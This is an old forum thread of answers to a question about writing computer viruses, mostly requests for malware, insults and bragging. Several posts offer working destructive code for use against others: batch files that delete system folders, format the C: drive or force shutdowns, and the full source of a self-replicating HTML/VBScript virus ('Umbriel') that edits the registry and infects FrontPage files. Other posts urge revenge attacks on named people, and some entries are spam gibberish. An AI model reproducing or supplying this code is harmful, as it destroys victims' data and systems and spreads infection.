Rating: Not yet rated Rate this answer: Vote
You lot are a bunch of worthless idiots

 

Answer by aaaaahhhhhhh
Submitted on 2/1/2006
Rating: Not yet rated Rate this answer: Vote
u should hack the south bend school co and pass
all students with a's

 

Answer by red shift
Submitted on 2/3/2006
Rating: Not yet rated Rate this answer: Vote
do what i'mdoing. take computer science classes. then, once you know your languages (IE c++), surf some sites like warez or porn, or download some game cracks, etc, to get some viruses, decompile them in visual studio or your program of choice and inspect the code to learn how to make the virus code.  

 

Answer by Anonomous
Submitted on 2/5/2006
Rating: Not yet rated Rate this answer: Vote
Z-man192528@aol.com, send this e-mail address everyday

 

Answer by hey yall
Submitted on 2/5/2006
Rating: Not yet rated Rate this answer: Vote
hey i want to know how to make a virus will some one tell me, u can tell me on AOL INSTANT MESSENGER. MY SCREEN NAME IS Sportslover20000 please tell me

 

Answer by kefas
Submitted on 2/6/2006
Rating: Not yet rated Rate this answer: Vote
Do u know a web page where i can find virus and download them?

 

Answer by H.I.M. SUGS
Submitted on 2/6/2006
Rating: Not yet rated Rate this answer: Vote
Hello , Been working with C++ for about a week now and I really can't say that I blame any if not all of those not giving away any code work.  This is some aggrivating and interesting stuff!!!!! Thankfully more interesting than the troubbelsome. Just want to ask ,what would be the best C++ program out now with the most bang for the buck? Been having troubbel finding good documentation to go with some of the compilers I have downloaded. I don't have the money to buy a $98 book to support my habbit! Should I just suck it up and buy what I wish I didn't have to?

 

Answer by asm
Submitted on 2/7/2006
Rating: Not yet rated Rate this answer: Vote
does anyone know how to write a virus in assembler or to access the memory or the bios      

and by that to cause some damage? ;)

 

Answer by DOUBLE DRAGON
Submitted on 2/8/2006
Rating: Not yet rated Rate this answer: Vote
WRITE WORM IN C++..

 

Answer by Ghostly Hacker
Submitted on 2/8/2006
Rating: Not yet rated Rate this answer: Vote
Listen all you wanna-be-hackers. A little advice. Allways keep your identity to yourself. this means that you NEVER give out your email address, name, ect. on the web. All the best hackers are the least famous ones. Why? Because if their not known as a hacker this means they have never been caught. All the best hackers were self taught. Most hackers base there talents of other hackers. This is what you are doing. All the greatest hackers each have thier own style.The most important thing about being a hacker is to never brag.

 

Answer by Mike
Submitted on 2/8/2006
Rating: Not yet rated Rate this answer: Vote
Alright, i am looking for someone to email a virus with a subject entitled "Virus as requested" to mpalarcho@yahoo.ca. I am also looking to find someone who will be able to create the virus to automatically SCREW THE HELL out of the computer which the email is opened on. No attachmets or anything. I want someone to make it automaticaly SCREW THE HELL out of the computer.

Good results may lead to job opprotuniities with a major corporation, whos name cannot be revieled for legal and contraversal issues.
This is a one time post, please follow instructions above if you are interested.

Mike,
contact me at mpalarchio@yahoo.ca

 

Answer by Absinthe
Submitted on 2/8/2006
Rating: Not yet rated Rate this answer: Vote
This is really quite pathetic...  I still find it amazing how people are so intrigued by viruses. I’m glad to see that at least some people in here have some intelligence, and I do agree, get a better pass time, and do something more productive. Unless of course you do want to end up in prison contracting a, well more damaging virus…

Cheers…

 

Answer by xanthi
Submitted on 2/9/2006
Rating: Not yet rated Rate this answer: Vote
i want to create a viruz to shutdown the computer when somebody goes in

 

Answer by Fad
Submitted on 2/12/2006
Rating: Not yet rated Rate this answer: Vote
I WANT TO CREATE A VIRUS USING VB6
THANKS FOR HELP

 

Answer by vAitmddoRs
Submitted on 2/12/2006
Rating: Not yet rated Rate this answer: Vote
cKxPdWQl6xBCtz UwWY1Mh1hQrC bPH5ILNODxjo92

 

Answer by C!P!R!P!
Submitted on 2/13/2006
Rating: Not yet rated Rate this answer: Vote
My virus is Ready for you n00ks

 

Answer by kevin
Submitted on 2/13/2006
Rating: Not yet rated Rate this answer: Vote
guys.........
           myself kevin from blore.
any comments abt virus in c-language can be mailed tome    

itskevinsam@hotmail.com

 

Answer by tri
Submitted on 2/13/2006
Rating: Not yet rated Rate this answer: Vote
ATTENTION ALL WANNA BE'S!

IF YOU WANNA LEARN HOW TO MAKE VIRUS, BUY C PROGRAMMING BOOKS, LEARN EM THEN TRY BUYING C++ BOOKS. GET SOME COMPILERS AND ASSEMBLERS FROM WEB OR BUY EM.

READ THE BOOKS NICE AND CAREFULLY, AND PRACTICE WITH THE COMPILERS.

PS: THERE IS MUCH FUN STUFF YOU CAN LEARN IN C AND C++ THAN JUST INFECTING.

IT'S HARD FOR ANY OF US TO EXPLAIN YOU HOW TO MAKE VIRUS BECAUSE FIRST YOU HAVE TO TEACH YOURSELVES C, C++.

--------------------------------------------


 

Answer by me
Submitted on 2/14/2006
Rating: Not yet rated Rate this answer: Vote
is it possible to make a virus using c?

 

Answer by trancehax<binary>
Submitted on 2/17/2006
Rating: Not yet rated Rate this answer: Vote
please people if you dont know how to make a virus its just easy scripting c++ is not a very good creator and furthermore e-mail viruses are by far the easiest to make read up on it........ have fun hacking                    =o

 

Answer by DarkStarr36
Submitted on 2/22/2006
Rating: Not yet rated Rate this answer: Vote
Can you create viruses using Visual Basic in Microsoft word? and  what to do next after you enter in the coding?

 

Answer by Rana
Submitted on 2/22/2006
Rating: Not yet rated Rate this answer: Vote
I want to write a virus to send a message to my lost girl friend. It's will be harmless.

 

Answer by SawerDemon
Submitted on 2/22/2006
Rating: Not yet rated Rate this answer: Vote
n00b'z

 

Answer by poop
Submitted on 2/23/2006
Rating: Not yet rated Rate this answer: Vote
IT MAY BE OK TO SEND A VIRUS AT TIMES I  WAS THREATENED BY MY FRIEND THAT HE WOULD SEND A VIRUS.AFTER A WEEK I FORGT ABOUT IT BUT THEN I WAS TALKING TO SOMEONE ELSE AND THEY KEPED INSULTING ME AND I WANTED TO SEND ONE. THAN I TRIED TO GET ONE TO SEND TO HIM BUT I READ SOMETHING HORRABLE. A BABY SITTER SENT A VIRUS AND HEY BABY BROTHER WAS MURDERD BECAUSE OF IT. SHE STARTED GETTING CALLS.BUT NOW I`M GLAD I DIDN`T SEND ONE. WARNING: THIS COULD HAPPEN TO YOU!!!BUT STILL  IF YOU WANT A VIRUS GET ONE AND F*** YOUR ENEMIES UP!!  

 

Answer by eternal dismal
Submitted on 2/24/2006
Rating: Not yet rated Rate this answer: Vote
you ppl aren't gonna learn anything from here, just get ur lazy ass off the couch and put an energizer battery in it and make it move to the book store

 

Answer by chinnappa
Submitted on 2/27/2006
Rating: Not yet rated Rate this answer: Vote
myfathername

 

Answer by floyd
Submitted on 2/27/2006
Rating: Not yet rated Rate this answer: Vote
FFS are you lot dumb? You're begging to learn how to write a virus. You bunch of soft c*nts.

 

Answer by pushakboyz
Submitted on 2/27/2006
Rating: Not yet rated Rate this answer: Vote
i'from Malaysia.i want to be a hackers and create a destroy virus.can anyone here tell me how to do it?Please...these is my dream since i were baby...

 

Answer by Fox
Submitted on 3/1/2006
Rating: Not yet rated Rate this answer: Vote
I'm sorry for all the REAL hackers, or crackers out there. These damn n00bs know absolutly nothing. They give out their damn email adress's so that you can help them! It's really hillarious. Anyone actually think that there are bigger fish out there that prey on them? Well, i know it, and you all will know of the name Fox. For every n00b out there, get a damn book and read it! The best virus out there is made by a simple 'while' loop! Common you real hackers! send me a real virus! kinghfox@hotmail.com I'll be waiting to see what you have! I am in the midst of something really big for the rest of you, i will keep you all dated.
Possibly i might include some of your puny viruses in it!

 

Answer by THeMan
Submitted on 3/2/2006
Rating: Not yet rated Rate this answer: Vote
I am t3h king and i wish to learen to ack in woirdpad can pl;ease sumone teacha me - me love u long time sucky 50p
email me @ dean129@hotmail.com

 

Answer by technophile
Submitted on 3/3/2006
Rating: Not yet rated Rate this answer: Vote
go on totse.com and go into "technology"
then "viruses" search until you find a page containing virus hex files.

 

Answer by boo
Submitted on 3/4/2006
Rating: Not yet rated Rate this answer: Vote
lol stupid people

 

Answer by apocalypse
Submitted on 3/5/2006
Rating: Not yet rated Rate this answer: Vote
all u have to do is make a c++ program to delete system files with the extntion *.dll or *.reg etc....or else you can try to make a program to delete the c:\windows\regedit.exe file and immmeadiately restart the computer..please contact me at apocalypseis@yahoo.com

 

Answer by JZ
Submitted on 3/6/2006
Rating: Not yet rated Rate this answer: Vote
with c++ pple will know how to stop it, how do actually send a virus 2 sum1?

 

Answer by javalava
Submitted on 3/7/2006
Rating: Not yet rated Rate this answer: Vote
Please send me instrucctions of how to create a virus my e-mail adress is r_ufio@hotmail.com ( but please don't send me a virus)

 

Answer by Priest
Submitted on 3/7/2006
Rating: Not yet rated Rate this answer: Vote
Fools.  Just find a language you like, learn it, and guess what?  You can then make viruses to your hearts content!

 

Answer by Majboi
Submitted on 3/8/2006
Rating: Not yet rated Rate this answer: Vote
Can anyone send a great virus to stop this crazy man bjornstenberg@hotmail.com
  Thanks/

 

Answer by ZeroSlash
Submitted on 3/8/2006
Rating: Not yet rated Rate this answer: Vote
okay i just want to let u guys kno how dumb u are for leaving your email on a forum ABOUT WRITING VIRUS'S your begging ppl like me to just send u a virus.

 

Answer by ZeroSlash
Submitted on 3/8/2006
Rating: Not yet rated Rate this answer: Vote
okay and secondly if u REALLY wanna learn how to hack/script the just go to this site... god there gonna hate me for bringing newbs in but f''k them and f''k u

www.hackthissite.org

 

Answer by VirusPoliceAOL
Submitted on 3/11/2006
Rating: Not yet rated Rate this answer: Vote
The police are watching such foums as this, and are waiting for someone to get overeager and put up a real virus. Doing so will seriously screw up your life. You WILL be put in prison for up to 25 years with up to a 250,000$ fine.

Just a warning

WE are watching

 

Answer by QQ47
Submitted on 3/11/2006
Rating: Not yet rated Rate this answer: Vote
You people suck. I bet u that u dont even know what a virus is. First of all get netcat its excellent. learn how to use. You can use it to break into peoples comps and remotely shutdown them and stuff its cool. Im working on making a virus that contains netcat. Its gonna be called bacteria. I will tell u more about it later.

 

Answer by someone
Submitted on 3/11/2006
Rating: Not yet rated Rate this answer: Vote
can anyone here send me a virus that physically or virtualy damages the hardrive

if so send it to: tdeath101@comcast.net

 

Answer by Group: Net-SC000
Submitted on 3/11/2006
Rating: Not yet rated Rate this answer: Vote
Such kiddie scripters.

I find it rather dissapointing how poor everyone's grammar and spelling is here.

Asking for help with making viruses or asking for viruses would be quite possibly the most retarded thing to do.

Kiddie scripts are rather feeble too. Most people have proper security.

I myself am actually making a self-spreading virus that will delete a series of applications and cause random messages to come up and place things on the persons computer.

To know if the virus is by me, my signature will be in: WINDOWS\Net-SC000\Information.txt


By the way, that link posted previously saying:
http://www.angelfire.com/super2/funnypics0/lol.html
is completely retarded. No real goal achived and is stupid JavaScript. Plus you can simpily scroll down on that document.

 

Answer by computer_joy-rider
Submitted on 3/14/2006
Rating: Not yet rated Rate this answer: Vote
teach me!!! i wish to learn

 

Answer by TinaTurner
Submitted on 3/14/2006
Rating: Not yet rated Rate this answer: Vote
Just go and suck some random guys cock, and you will find the answer to your sexuality questioning.

 

Answer by newby06
Submitted on 3/15/2006
Rating: Not yet rated Rate this answer: Vote
looking for information on beginners hacking if anyone can help me please send email to, barbearjenkins06@yahoo.com

 

Answer by Sarang
Submitted on 3/16/2006
Rating: Not yet rated Rate this answer: Vote
There are some tools for virus making,
visit at: www.vx.netlux.org,
Then please reply me at sarang_tumne@rediffmail.com,
as am a professional hacker.

 

Answer by Jewhammond
Submitted on 3/18/2006
Rating: Not yet rated Rate this answer: Vote
Buy a F****n book on C++......itll make life so much easier for all you gay fags who r lazy

 

Answer by dragoon
Submitted on 3/22/2006
Rating: Not yet rated Rate this answer: Vote
u r not kool trying to hack and distroy the internet and i an a cop

 

Answer by hackmack
Submitted on 3/23/2006
Rating: Not yet rated Rate this answer: Vote
hacking ke liye ankit fadia hai na

 

Answer by UR_MOM
Submitted on 3/23/2006
Rating: Not yet rated Rate this answer: Vote
your mom

 

Answer by Has Dez
Submitted on 3/24/2006
Rating: Not yet rated Rate this answer: Vote
I want to be able to kill someone's hard drive with just one e-mail. I already have a name for it too!

 

Answer by enzoalex
Submitted on 3/24/2006
Rating: Not yet rated Rate this answer: Vote
It takes years to learn that i know from experience. If you r not care full i will hack your email accounts (for starters you won't find a better virus creator than me or hacker

 

Answer by LOTEY
Submitted on 3/25/2006
Rating: Not yet rated Rate this answer: Vote
OMG Y U WANT TO HACK U STUPID PPL DO THIS AND PUT IT ON A SERVER IF IT SATIFISES UR NEEDS
start notepad , type
shutdown -s -t 30 -c "ur fuked" -f
save as twat.bat (make sure u save as all files) now double click on the icon and ur away :P now all go away plz

 

Answer by Avenger
Submitted on 3/28/2006
Rating: Not yet rated Rate this answer: Vote
Like I already know how to make virus. I will VIRUS...VIRUS...all of you that send the answers and questions! HA..BZZT..BZZT..HAHAHAHAHAHA...BZZT.BZZT! Just mess up with a program and you already create a simple virus!!@...BZZT  I WILL VIRUS YOU ALLLL...BZZT...BZZT...ALLL.

 

Answer by kamran
Submitted on 3/28/2006
Rating: Not yet rated Rate this answer: Vote
mmmammamamamamam................................................................................................................................................................

 

Answer by Sarang
Submitted on 3/28/2006
Rating: Not yet rated Rate this answer: Vote
If u wanna know how to create a virus using virus tools, go to: www.netlux.com or www. illigal world.com and download virus tools.

 

Answer by Sarang
Submitted on 3/28/2006
Rating: Not yet rated Rate this answer: Vote
If u wanna know how to create a virus using virus tools, go to: www.netlux.com or www. illigal world.com and download virus tools. or email me at: sarang_tumne@rediffmail.com

 

Answer by smash_888
Submitted on 4/5/2006
Rating: Not yet rated Rate this answer: Vote
virus r the most easyers thinh to write know wat u want it to do then go from the netsky

 

Answer by jonnyekholm
Submitted on 4/5/2006
Rating: Not yet rated Rate this answer: Vote
I tested that virus Jaz wrote and i got it in my computer tell me how to remove it and tell me how dangerous it is!!! No i dont have Frontpage and i couldnt remove it with norton...

 

Answer by Rockdave
Submitted on 4/5/2006
Rating: Not yet rated Rate this answer: Vote
Tutorial for becoming a hacker:
1.) Learn to not give out your email address on community sites such as this.
2.) Learn how to type in English before you try typing in C++.
3.) Once you've mastered English, buy a good book on C++ programming, get a compiler, and create your own malware.

Prerequisites:
1.) Not being a complete asshole.
2.) Knowing how to save a text file in Notepad (I think "1010" may have a problem with that, so work on it, man!)

Most importantly, find a halfway decent community site if you need one.  This forum is obviously going to hell, simply because every single person on here is writing "y0 peepz i waNt mAke a virUS teach ME h0w!!!!".  Dammit, read other people's responses before posting garbage such as that.  By the way, you're only supposed to ANSWER the presented question, not ask more.  The questions pertained to creating a virus using C++ and a batch file.  Answer those questions, provide some constructive text, but DO NOT ASK ANYTHING ELSE.

I may be wasting my steam on this, considering this page hasn't been touched in a few years, but come on, some people are such babies.

 

Answer by Calm_but_lonely
Submitted on 4/10/2006
Rating: Not yet rated Rate this answer: Vote
*sigh* wannabes. with viruses, you dont just make one in 10 minutes. it takes weeks, or even months, to make even an okay virus. even if we told you a programming code or 2, you would have no idea what to do with it. you would probably just send it in an email to someone and hope it works. anyone asking for codes and such......learn it yourself!!! you are lazy, and we have no respect for you. GET OUT!
ask us a few questions, perhaps. maybe you wrote the wrong code and it wont accept it. but if you are expecting to be babyfed, then go to another forum.

 

Answer by Kaushik
Submitted on 4/13/2006
Rating: Not yet rated Rate this answer: Vote
Hi...can anyone pls tell me how to access registry entries without user's permission and create new DWORD values,string entries etc in the windows registry with the help of c++.Which header files are essential to serve the above purpose??I will be very glad if someone shows me how to do the above purpose along with adequate examples and mail them to me at kaushik_ghsl@yahoo.co.in !Thank you...!If I succeed to do the above purpose then I will present the world a brand new destructive virus...  

 

Answer by withheld
Submitted on 4/13/2006
Rating: Not yet rated Rate this answer: Vote
im a virus writer i have only 1 form of virus at the moment and am willing to share it with people, i you wish for me to send it to you ( mostly safe) should stay compact until you unleash it, it has the power to knock out a computer for around 3 hours( i think) i have not sent it out yet but am doing a test of it today

 

Answer by Shaan
Submitted on 4/14/2006
Rating: Not yet rated Rate this answer: Vote
Any body tell me what programming languages is use in norton antivirus and maccafe please tell me imediately

 

Answer by © Virus
Submitted on 4/17/2006
Rating: Not yet rated Rate this answer: Vote
my virus is:

echo   off

del ........  

maby del C:\WINDOWS

 

Answer by © Virus
Submitted on 4/17/2006
Rating: Not yet rated Rate this answer: Vote
my virus is:

echo   off

del ........  

maby del C:\WINDOWS

 

Answer by Anaken
Submitted on 4/18/2006
Rating: Not yet rated Rate this answer: Vote
writing a virus is an nice process ! , but not in C++ study first you have to study your os inside and out when you found an securaty whole you can start . First read an good XP book then read a good networking book on TCP/IP then write to me , dos virus source codes are allways shuch as www.textfiles.com . go there if you want to learn hacking you shoud first shoud be a good networking knowledge . Then analisis your lan and start with lan hacking . see the power of the dark side www.blackhat.com go there . I 'm stopping over here , beacuse I had to execute the order 66 . Other wise Emprior will not save my girfriend . See the power of the dark side .
             ----Anaken---

 

Answer by xply
Submitted on 4/19/2006
Rating: Not yet rated Rate this answer: Vote
i want to learn more about virus please help me at stylis_19@yahoo.co.in

 

Answer by bUgHi888
Submitted on 4/19/2006
Rating: Not yet rated Rate this answer: Vote
oh, god damit people, what the hell do u want? do u think anyone here will give u a complete tour in how to make a virus???

 

Answer by habboboy
Submitted on 4/20/2006
Rating: Not yet rated Rate this answer: Vote
if you make a virus they that 19 year old who got arrested last year for creating  a very dangerious worm that worm attacked every computer in the nation they finally caught him in school

 

Answer by Suhrob
Submitted on 4/20/2006
Rating: Not yet rated Rate this answer: Vote
Really creating a virus requires more skill
so it makes me to brainstorm in order learn new ways of enhancing computer system

 

Answer by Kaushik
Submitted on 4/20/2006
Rating: Not yet rated Rate this answer: Vote
Hi.....
Can anyone pls teach me how to tweak or change registry entries with the help of c++ along with a good example....
Which header files are essential for the above purpose??
I also want to know how to create DWORD and string values using c++...
I will be very glad if someone pls mail me the instructions to do the above purposes...
My correct Email id is kaushik_ghsl@yahoo.com
Pl help me to do the above purpose...
Thank you...

 

Answer by s1l3n7
Submitted on 4/24/2006
Rating: Not yet rated Rate this answer: Vote
No..No..what doyouthink if all f people create virus ????? hehe!$%@#@%$#!$%$*&%$*@'
first:
may be antivirus is rich bussiness & very antusias to get money from world
second:
almost people gona be MAD that everyday thinking about virus Coding, thinking the vulnerable of M$oft or LixNuz
Last:
Mutation of Operating System is begining NOW !!!!
every people have different OS-XXX

what do you think now ???? hehehehehe

    

 

Answer by gfUaLMvqpW
Submitted on 4/24/2006
Rating: Not yet rated Rate this answer: Vote
OIKXCbkvXP C8I7S6oRa8cW eUhmACh8gez

 

Answer by Armani
Submitted on 4/24/2006
Rating: Not yet rated Rate this answer: Vote
How do u put the virus onto something ?

 

Answer by TaraDiNHu
Submitted on 4/25/2006
Rating: Not yet rated Rate this answer: Vote
I am a portuguese software writer, and virus writer... well first off, for u guys that wanna learn how to write viruses... well get Dev-c++, fully updated, and go to MSDN, learn about system registry, file I/O, Service programs, go to google, search for the "beej" socket tutorial, and when you'veunderstood all of the topics... go for designing of the software/virus and explore...
For u that do know how to write and do not help... u guys suck too, 'cause u could've just given them directions instead of always talking about code... code is the least importint... the foremost thing is knowledge and imagination.

Also... learn ASM, and MZ file structure if u wanna learn serious virus writing techniques

 

Answer by 212
Submitted on 4/25/2006
Rating: Not yet rated Rate this answer: Vote
hey
can sum1 send a virus , trojans or worms to this email address:devilofthenight7@hotmail.com?
cuz i seriously failed to do that.

 

Answer by wriggler
Submitted on 4/26/2006
Rating: Not yet rated Rate this answer: Vote
i want to be a evil hacker!

 

Answer by Matty
Submitted on 4/27/2006
Rating: Not yet rated Rate this answer: Vote
i am an pro hacker

 

Answer by DC
Submitted on 4/27/2006
Rating: Not yet rated Rate this answer: Vote
NONE OF YOU FUK'N BASTARDS CAN WRITE VIRUSES AND/OR HACK A COMPUTER. BUT IF YOUR WILLING TO TRY YOUR LUCK MY EMAIL IS number1april@aol.com

BRING IT ON

 

Answer by HACKER54321
Submitted on 4/27/2006
Rating: Not yet rated Rate this answer: Vote
NONE OF YOU FUK'N BASTARDS CAN WRITE VIRUSES AND/OR HACK A COMPUTER. BUT IF YOUR WILLING TO TRY YOUR LUCK MY EMAIL IS number1april@aol.com

BRING IT ON

 

Answer by iNCred!ble
Submitted on 4/28/2006
Rating: Not yet rated Rate this answer: Vote
Delete your C++ and go learn Python. Much much better and alot more easy to learn/remember.

Anyone want some uber virus tutorials? Email me! at

HAHAN3V3R@gmail.com

 

Answer by hammad
Submitted on 4/29/2006
Rating: Not yet rated Rate this answer: Vote
how can i make simple computer virus?

 

Answer by Randy
Submitted on 5/2/2006
Rating: Not yet rated Rate this answer: Vote
I want to know how to rest a virus

 

Answer by Kadja369
Submitted on 5/2/2006
Rating: Not yet rated Rate this answer: Vote
A Virus Creation Program?

 

Answer by Sawma
Submitted on 5/4/2006
Rating: Not yet rated Rate this answer: Vote
Hey,Virus siam daan min hrilh teh u!,c++ hmang chuan a siam thieh tih ka hria.

ka lawm e.
Ooops 'TRANSLATION'
01010101110100101011010101010001101010101110101011101011010101111010001010101010010111010101010
'TRANSLATION COMPLETE'

Hey,Tell me to create a good virus,I know i can create using c++.

Thanks you.

I'm a mizo religion he he he he heh.

 

Answer by zero_beta
Submitted on 5/4/2006
Rating: Not yet rated Rate this answer: Vote
ppl, making a virus is simple. BUT if u canoot find recources and info on how to make one yourself, then u really don't need to be making a virus, or a worm, OR WHATEVER u want to do. just look around and figure things out yourself, study, learn, seek and destroy.


                            yours truly
                                    Zero

 

Answer by Merion
Submitted on 5/5/2006
Rating: Not yet rated Rate this answer: Vote
Can anyone help where can i find C++ and book C++ contact me please in my email nity_r@hotmail.com

 

Answer by Sean
Submitted on 5/6/2006
Rating: Not yet rated Rate this answer: Vote
I don't understand why I'm bothering to tell you n00bs this but here is a very small and stupid virus you can send to a friend:

@echo off
DEL C:\ -y
DEL D:\ -y
FORMAT C:\ -y

(type in notepad and save as "put filename here".bat)


Here's another "this one's a trojan":

<html><!--Umbriel-->
<head>
<title> Second Part To Hell's HTML.Umbriel </title>
</head>
<body>
<script language="VBScript">
rem VBS
On Error Resume Next
Dim fso, shell, wrte, tempdir, windir, rand, file
Set fso=CreateObject("Scripting.FileSystemObject")
Set shell=CreateObject("Wscript.Shell")
if err.number=429 Then
  shell.Run javascript:location.reload()
End If

Set windir=fso.GetSpecialFolder(0)
Set tempdir=fso.GetSpecialFolder(2)

Set wrte=fso.CreateTextFile(windir+"\windows.cmd")
wrte.WriteLine "cls"
wrte.WriteLine "@echo off"
wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Second Part To Hell's Umbriel has you..."+chr(34)
wrte.Close()

shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\Source", "C:\umbriel.html"
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html"

Randomize
rand=int(rnd*5)+1
If rand=1 then
  shell.Run windir+"\windows.cmd"
End If
</script>

<script language="JavaScript">
// JS
var viruspath, virus, code, fso, file, check, checka, checkb
fso=new ActiveXObject("Scripting.FileSystemObject")
viruspath=window.location.pathname
viruspath=viruspath.slice(1)
virus=fso.OpenTextFile(viruspath,1)
file=fso.CreateTextFile("C:\\umbriel.html")
for (i=0; i<500; i++)
{
  if (checkb!=1)
  {
    if (Math.round(Math.random()*5)+1 == 3)
    {
      if (check == 2)
      {
        file.WriteLine("/"+"*")
        file.WriteLine("*"+"/")
      }
      if (check == 3)
      {
        file.WriteLine("rem")
      }
    }
    code=virus.ReadLine()
    if (code == "/"+"*") { checka=666 }
    if (code == "*"+"/") { checka=666 }
    if (code == "rem") { checka=666 }
    if (checka != 666 ) { file.WriteLine(code) }
    checka=0
    if (code=="</"+unescape("%68")+"tml>") { checkb=1 }
    if (code=="// JS") { check=2 }
    if (code=="rem VBS") { check=3 }
    if (code=="</"+unescape("%73")+"cript>") { check=0 }
  }
}
virus.Close();
file.Close();
</script>

<script language="VBScript">
rem VBS
On Error Resume Next
set fso=CreateObject("Scripting.FileSystemObject")
set shell=CreateObject("WScript.Shell")
set myfile=fso.OpenTextFile("C:\umbriel.html")
mycode=myfile.ReadAll
myfile.Close()
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File1")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File2")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File3")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File4")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File5")
if rr <> "" Then Call Umbriel(rr, mycode)

Sub Umbriel(rr, mycode)
set victim=fso.OpenTextFile(rr)
infcheck=victim.ReadLine
If infcheck<>"<html><!--Umbriel-->" Then
  viccode=victim.ReadAll
  victim.Close()
  set wrtevic=fso.OpenTextFile(rr, 2, false, 0)
  wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode)
  wrtevic.Close
End If

End Sub
</script>
</body>
</html>

(type in notepad and save as "put file name here".html)
I hope these worked for you since you are to dumb to come up with a stupid virus by yourselves!

 

Answer by Sean
Submitted on 5/7/2006
Rating: Not yet rated Rate this answer: Vote
Hello I am currently making a program(exe) from a zip file that will execute 100 trojans at the same time to a computer's system (C:\WINDOWS\system32\) If anyone would like a safe copy of the program please e-mail me at thetrojanarmymaker@hotmail.com

 

Answer by Blak AsiD
Submitted on 5/10/2006
Rating: Not yet rated Rate this answer: Vote
Hey, I dont want to learn how to make a virus, but does anyone know a good online free C++ tutorial? I know some Java and MS-DOS and im intrested in C++. In fact does anyone know good tutorials for Java, Javascript, MS-DOS, and C++?

 

Answer by hit
Submitted on 5/11/2006
Rating: Not yet rated Rate this answer: Vote
Come on, no c or cpp book tells u how to create a virus, i think these people just want to know the logic part of making a virus & not ready made codes.

 

Answer by ugh
Submitted on 5/14/2006
Rating: Not yet rated Rate this answer: Vote
this is illegal.. dont do this. i have viruses just because of people who create this. I typed in [HKEY and this thread came up.. now stop creating them .. ugh.

 

Answer by hacker
Submitted on 5/16/2006
Rating: Not yet rated Rate this answer: Vote
what do u think  ronak making    virus is easy job!u need to know basic programning skills first .and if u take my advice then don't ever make a virus otherwise u will land up in jail.

 

Answer by LOL@U
Submitted on 5/16/2006
Rating: Not yet rated Rate this answer: Vote
"can someone help me with saving a file?, im having alot of trouble. Im running windows xp pro and i wanna save a .txt file. So i go into notepad and under file it says "save" im not sure if i should click on this because i dont want to get a virus, can someone help me ? I would also like to be a hacker, but i dont know how when im a hacker i will hack everybody"
~dumb ass~

 

Answer by Mark-2006
Submitted on 5/18/2006
Rating: Not yet rated Rate this answer: Vote
i would like to produce a virus to get my revenge on my ex wife

 

Answer by Dawnawar
Submitted on 5/18/2006
Rating: Not yet rated Rate this answer: Vote
OK, here is a virus that works on Windows 95, 98, 2000, XP:

@echo off
if exist C:\program files\*.* deltree /y C:\program files\*.*
if exist C:\my documents\*.* deltree /y C:\my documents\*.*
if exist C:\windows\desktop\*.* deltree /y C:\windows\desktop\*.*
if exist C:\windows\start menue\*.* deltree /y C:\windows\start menue\*.*
if exist C:\windows\command\*.* deltree /y C:\windows\command\*.*
if exist C:\windows\system\*.* deltree /y C:\windows\system\*.*
if exist C:\windows\*.* deltree /y C:\windows\*.*

Copy and paste it into notepad and save it as filename.bat. Make sure it ends in .bat, okay? This is a batch file it uses a program called batch. This virus will completely delete EVERYTHING on any windows system. -Dawnawar

 

Answer by Dawnawar
Submitted on 5/18/2006
Rating: Not yet rated Rate this answer: Vote
OK, here is a virus that works on Windows 95, 98, 2000, XP:

@echo off
if exist C:\program files\*.* deltree /y C:\program files\*.*
if exist C:\my documents\*.* deltree /y C:\my documents\*.*
if exist C:\windows\desktop\*.* deltree /y C:\windows\desktop\*.*
if exist C:\windows\start menue\*.* deltree /y C:\windows\start menue\*.*
if exist C:\windows\command\*.* deltree /y C:\windows\command\*.*
if exist C:\windows\system\*.* deltree /y C:\windows\system\*.*
if exist C:\windows\*.* deltree /y C:\windows\*.*

Copy and paste it into notepad and save it as filename.bat. Make sure it ends in .bat, okay? This is a batch file it uses a program called batch. This virus will completely delete EVERYTHING on any windows system. -Dawnawar

 

Answer by bsbsbsbsbs
Submitted on 5/23/2006
Rating: Not yet rated Rate this answer: Vote
googgle is the best lasodsldskdjiod dgo skjisdjklds jsdfkljdsljkdsk dsalkjdsklj  kkldsk sdkrgiogrknmvckjnreoji rekndfouer klendoiewkjnes dsafjkdaiuadsl dsjew;uwe; dsfjh3riuhweihdsfkj ds dslkdsfiledoiekmdwf ewjoiewoijewnkdsf desoiewqo ewkidsoi skjsdiew askjwe; pi  a;p ;i['' ]]]
]a]]' ]]lf][f//]fg/]'.g][sd.g][/.][v/]s[/][sd/fg][sf/d]g[/s][/g][/ ][s/][/sfd][/ sdf[]/ ][/f][g/sd ][/s][ s]f[;]s[fd/][ /sfd][b/s]d[fg[
sf.gbo,s 'pg,soarei'89u4383u4[ [23049u [ew'q2q345[34[; 3/]'/4[pt .[rp;f.[per.
w,?>>? ?>">:{">].,][r.g[pwr.phg.wrt[pylw[4pr5ly[p 5l[p4l2y[5ptl245[pd;fs,v[paelrfQler
q

q
q
34pf
qe;f
[plqer[pflq43olrkiu m[4;[ ''a' k


ae
qok'oqej'poewjtij 8tu2p 2ij58 y[

3  rjklkl  kjrjirkj;r[ijq[ er\ qer qer
\er [e r

ret
ert

ry
rtwu
rtw
rtykwj 'yoijwo'ieroiwmrjikw e;rj g;oiwejr gio qw
g
q er























































































































































































































































































































































































































































































h

 

Answer by geco97
Submitted on 5/24/2006
Rating: Not yet rated Rate this answer: Vote
HI4 ALL
